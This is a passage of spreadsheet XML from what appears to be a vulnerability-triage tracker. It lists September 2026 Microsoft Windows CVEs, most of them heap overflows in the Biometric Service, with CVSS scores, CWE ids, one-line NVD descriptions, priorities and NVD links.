      </c>
      <c r="C594" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72953</t>
        </is>
      </c>
      <c r="D594" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E594" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F594" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G594" s="5" t="inlineStr"/>
      <c r="H594" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I594" s="5" t="inlineStr"/>
      <c r="J594" s="5" t="inlineStr"/>
      <c r="K594" s="5" t="inlineStr"/>
      <c r="L594" s="5" t="inlineStr"/>
      <c r="M594" s="5" t="inlineStr"/>
      <c r="N594" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O594" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P594" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q594" s="5" t="inlineStr"/>
      <c r="R594" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S594" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows USB Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T594" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72953</t>
        </is>
      </c>
    </row>
    <row r="595">
      <c r="A595" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B595" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C595" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72957</t>
        </is>
      </c>
      <c r="D595" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E595" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F595" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G595" s="5" t="inlineStr"/>
      <c r="H595" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I595" s="5" t="inlineStr"/>
      <c r="J595" s="5" t="inlineStr"/>
      <c r="K595" s="5" t="inlineStr"/>
      <c r="L595" s="5" t="inlineStr"/>
      <c r="M595" s="5" t="inlineStr"/>
      <c r="N595" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O595" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P595" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q595" s="5" t="inlineStr"/>
      <c r="R595" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S595" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Deployment Services allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T595" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72957</t>
        </is>
      </c>
    </row>
    <row r="596">
      <c r="A596" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B596" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C596" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72965</t>
        </is>
      </c>
      <c r="D596" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E596" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F596" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G596" s="5" t="inlineStr"/>
      <c r="H596" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I596" s="5" t="inlineStr"/>
      <c r="J596" s="5" t="inlineStr"/>
      <c r="K596" s="5" t="inlineStr"/>
      <c r="L596" s="5" t="inlineStr"/>
      <c r="M596" s="5" t="inlineStr"/>
      <c r="N596" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O596" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P596" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q596" s="5" t="inlineStr"/>
      <c r="R596" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S596" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows WebClient Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T596" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72965</t>
        </is>
      </c>
    </row>
    <row r="597">
      <c r="A597" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B597" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C597" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72967</t>
        </is>
      </c>
      <c r="D597" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E597" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F597" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G597" s="5" t="inlineStr"/>
      <c r="H597" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I597" s="5" t="inlineStr"/>
      <c r="J597" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K5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97" s="5" t="inlineStr"/>
      <c r="M597" s="5" t="inlineStr"/>
      <c r="N597" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O597" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P597" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q597" s="5" t="inlineStr"/>
      <c r="R597" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S597" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Network Connection Broker allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T597" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72967</t>
        </is>
      </c>
    </row>
    <row r="598">
      <c r="A598" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B598" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C598" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72988</t>
        </is>
      </c>
      <c r="D598" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E598" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F598" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G598" s="5" t="inlineStr"/>
      <c r="H598" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I598" s="5" t="inlineStr"/>
      <c r="J598" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K59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98" s="5" t="inlineStr"/>
      <c r="M598" s="5" t="inlineStr"/>
      <c r="N598" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O598" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P598" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q598" s="5" t="inlineStr"/>
      <c r="R598" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S598" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T598" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72988</t>
        </is>
      </c>
    </row>
    <row r="599">
      <c r="A599" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B599" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C599" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72990</t>
        </is>
      </c>
      <c r="D599" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E599" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F599" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G599" s="5" t="inlineStr"/>
      <c r="H599" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I599" s="5" t="inlineStr"/>
      <c r="J599" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K59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599" s="5" t="inlineStr"/>
      <c r="M599" s="5" t="inlineStr"/>
      <c r="N599" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O599" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P599" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q599" s="5" t="inlineStr"/>
      <c r="R599" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="S599" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T599" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72990</t>
        </is>
      </c>
    </row>
    <row r="600">
      <c r="A600" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B600" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C600" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72991</t>
        </is>
      </c>
      <c r="D600" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E600" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F600" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G600" s="5" t="inlineStr"/>
      <c r="H600" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I600" s="5" t="inlineStr"/>
      <c r="J600" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K6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0" s="5" t="inlineStr"/>
      <c r="M600" s="5" t="inlineStr"/>
      <c r="N600" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O600" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P600" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q600" s="5" t="inlineStr"/>
      <c r="R600" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S600" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T600" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72991</t>
        </is>
      </c>
    </row>
    <row r="601">
      <c r="A601" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B601" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C601" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72992</t>
        </is>
      </c>
      <c r="D601" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E601" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F601" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G601" s="5" t="inlineStr"/>
      <c r="H601" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I601" s="5" t="inlineStr"/>
      <c r="J601" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K60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1" s="5" t="inlineStr"/>
      <c r="M601" s="5" t="inlineStr"/>
      <c r="N601" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O601" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P601" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q601" s="5" t="inlineStr"/>
      <c r="R601" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S601" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T601" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72992</t>
        </is>
      </c>
    </row>
    <row r="602">
      <c r="A602" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B602" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C602" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72993</t>
        </is>
      </c>
      <c r="D602" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E602" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F602" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G602" s="5" t="inlineStr"/>
      <c r="H602" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I602" s="5" t="inlineStr"/>
      <c r="J602" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K6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2" s="5" t="inlineStr"/>
      <c r="M602" s="5" t="inlineStr"/>
      <c r="N602" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O602" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P602" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q602" s="5" t="inlineStr"/>
      <c r="R602" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S602" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T602" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72993</t>
        </is>
      </c>
    </row>
    <row r="603">
      <c r="A603" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B603" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C603" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72994</t>
        </is>
      </c>
      <c r="D603" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E603" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F603" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G603" s="5" t="inlineStr"/>
      <c r="H603" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I603" s="5" t="inlineStr"/>
      <c r="J603" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K60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3" s="5" t="inlineStr"/>
      <c r="M603" s="5" t="inlineStr"/>
      <c r="N603" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O603" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P603" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q603" s="5" t="inlineStr"/>
      <c r="R603" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="S603" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T603" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72994</t>
        </is>
      </c>
    </row>
    <row r="604">
      <c r="A604" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B604" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C604" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72995</t>
        </is>
      </c>
      <c r="D604" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E604" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F604" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G604" s="5" t="inlineStr"/>
      <c r="H604" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I604" s="5" t="inlineStr"/>
      <c r="J604" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K60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4" s="5" t="inlineStr"/>
      <c r="M604" s="5" t="inlineStr"/>
      <c r="N604" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O604" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P604" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q604" s="5" t="inlineStr"/>
      <c r="R604" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="S604" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T604" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72995</t>
        </is>
      </c>
    </row>
    <row r="605">
      <c r="A605" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B605" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C605" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72996</t>
        </is>
      </c>
      <c r="D605" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E605" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F605" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G605" s="5" t="inlineStr"/>
      <c r="H605" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I605" s="5" t="inlineStr"/>
      <c r="J605" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K60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5" s="5" t="inlineStr"/>
      <c r="M605" s="5" t="inlineStr"/>
      <c r="N605" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O605" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P605" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="Q605" s="5" t="inlineStr"/>
      <c r="R605" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="S605" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T605" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72996</t>
        </is>
      </c>
    </row>
    <row r="606">
      <c r="A606" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B606" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C606" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72997</t>
        </is>
      </c>
      <c r="D606" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E606" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F606" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G606" s="5" t="inlineStr"/>
      <c r="H606" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I606" s="5" t="inlineStr"/>
      <c r="J606" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K60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6" s="5" t="inlineStr"/>
      <c r="M606" s="5" t="inlineStr"/>
      <c r="N606" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O606" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P606" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q606" s="5" t="inlineStr"/>
      <c r="R606" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S606" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T606" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72997</t>
        </is>
      </c>
    </row>
    <row r="607">
      <c r="A607" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B607" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C607" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73000</t>
        </is>
      </c>
      <c r="D607" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E607" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F607" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G607" s="5" t="inlineStr"/>
      <c r="H607" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I607" s="5" t="inlineStr"/>
      <c r="J607" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K60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7" s="5" t="inlineStr"/>
      <c r="M607" s="5" t="inlineStr"/>
      <c r="N607" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O607" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P607" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q607" s="5" t="inlineStr"/>
      <c r="R607" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S607" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T607" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73000</t>
        </is>
      </c>
    </row>
    <row r="608">
      <c r="A608" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B608" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C608" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73001</t>
        </is>
      </c>
      <c r="D608" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E608" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F608" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G608" s="5" t="inlineStr"/>
      <c r="H608" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I608" s="5" t="inlineStr"/>
      <c r="J608" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K60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8" s="5" t="inlineStr"/>
      <c r="M608" s="5" t="inlineStr"/>
      <c r="N608" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O608" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P608" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q608" s="5" t="inlineStr"/>
      <c r="R608" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S608" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T608" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73001</t>
        </is>
      </c>
    </row>
    <row r="609">
      <c r="A609" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B609" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C609" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73002</t>
        </is>
      </c>
      <c r="D609" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E609" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F609" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G609" s="5" t="inlineStr"/>
      <c r="H609" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I609" s="5" t="inlineStr"/>
      <c r="J609" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K60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09" s="5" t="inlineStr"/>
      <c r="M609" s="5" t="inlineStr"/>
      <c r="N609" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O609" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P609" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="Q609" s="5" t="inlineStr"/>
      <c r="R609" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S609" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T609" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73002</t>
        </is>
      </c>
    </row>
    <row r="610">
      <c r="A610" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B610" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C610" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73007</t>
        </is>
      </c>
      <c r="D610" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E610" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F610" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G610" s="5" t="inlineStr"/>
      <c r="H610" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I610" s="5" t="inlineStr"/>
      <c r="J610" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K61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10" s="5" t="inlineStr"/>
      <c r="M610" s="5" t="inlineStr"/>
      <c r="N610" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O610" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P610" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="Q610" s="5" t="inlineStr"/>
      <c r="R610" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S610" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T610" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73007</t>
        </is>
      </c>
    </row>
    <row r="611">
      <c r="A611" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B611" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C611" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73011</t>
        </is>
      </c>
      <c r="D611" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E611" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F611" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G611" s="5" t="inlineStr"/>
      <c r="H611" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I611" s="5" t="inlineStr"/>
      <c r="J611" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K61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11" s="5" t="inlineStr"/>
      <c r="M611" s="5" t="inlineStr"/>
      <c r="N611" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O611" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P611" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
